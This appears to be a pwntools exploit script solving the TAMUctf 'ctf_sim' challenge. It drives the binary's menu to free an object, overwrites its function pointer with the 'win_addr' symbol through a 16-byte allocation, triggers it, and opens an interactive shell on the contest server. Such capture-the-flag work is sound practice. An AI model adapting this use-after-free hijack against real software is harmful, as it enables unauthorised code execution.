1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89
| from pwn import *
class BinaryInfo: exe = "ctf_sim" libc = ""
host = "rua.host.goes.here" port = 8000
# Set up pwntools for the correct architecture exe = context.binary = ELF(BinaryInfo.exe) exe_rop = ROP(exe) if BinaryInfo.libc != "": libc = ELF(BinaryInfo.libc) libc_rop = ROP(libc) else: libc = None libc_rop = None
# Many built-in settings can be controlled on the command-line and show up # in "args". For example, to dump all data sent/received, and disable ASLR # for all created processes... # ./exploit.py DEBUG NOASLR # ./exploit.py GDB HOST=example.com PORT=4141 host = args.HOST or BinaryInfo.host port = int(args.PORT or BinaryInfo.port)
def start_local(argv=[], *a, **kw): '''Execute the target binary locally''' if args.GDB: return gdb.debug([exe.path] + argv, gdbscript=gdbscript, *a, **kw) else: return process([exe.path] + argv, *a, **kw)
def start_remote(argv=[], *a, **kw): '''Connect to the process on the remote host''' io = remote("tamuctf.com", 443, ssl=True, sni="ctf-sim") if args.GDB: gdb.attach(io, gdbscript=gdbscript) return io
def start(argv=[], *a, **kw): '''Start the exploit against the target.''' if args.LOCAL: return start_local(argv, *a, **kw) else: return start_remote(argv, *a, **kw)
# =========================================================== # EXPLOIT GOES HERE # =========================================================== # Arch: amd64-64-little # RELRO: Partial RELRO # Stack: No canary found # NX: NX enabled # PIE: No PIE (0x400000)
# Specify your GDB script here for debugging # GDB will be launched if the exploit is run via e.g. # ./exploit.py GDB gdbscript = ''' tbreak main continue '''.format(**locals())
io = start()
win_addr = exe.symbols["win_addr"]
io.sendlineafter(b"Quit\n> ",b'1') io.sendlineafter(b"Crypto\n> ",b'3') io.sendlineafter(b"(0-3)\n> ",b'0') io.sendlineafter(b"Quit\n> ",b'2') io.sendlineafter(b"(0-3)\n> ",b'0') io.sendlineafter(b"Quit\n> ",b'3') io.sendlineafter(b"writeup?\n> ",b'16') io.sendlineafter(b"writeup\n> ",flat({0:win_addr})) io.sendlineafter(b"Quit\n> ",b'2') io.sendlineafter(b"(0-3)\n> ",b'0') io.interactive()
|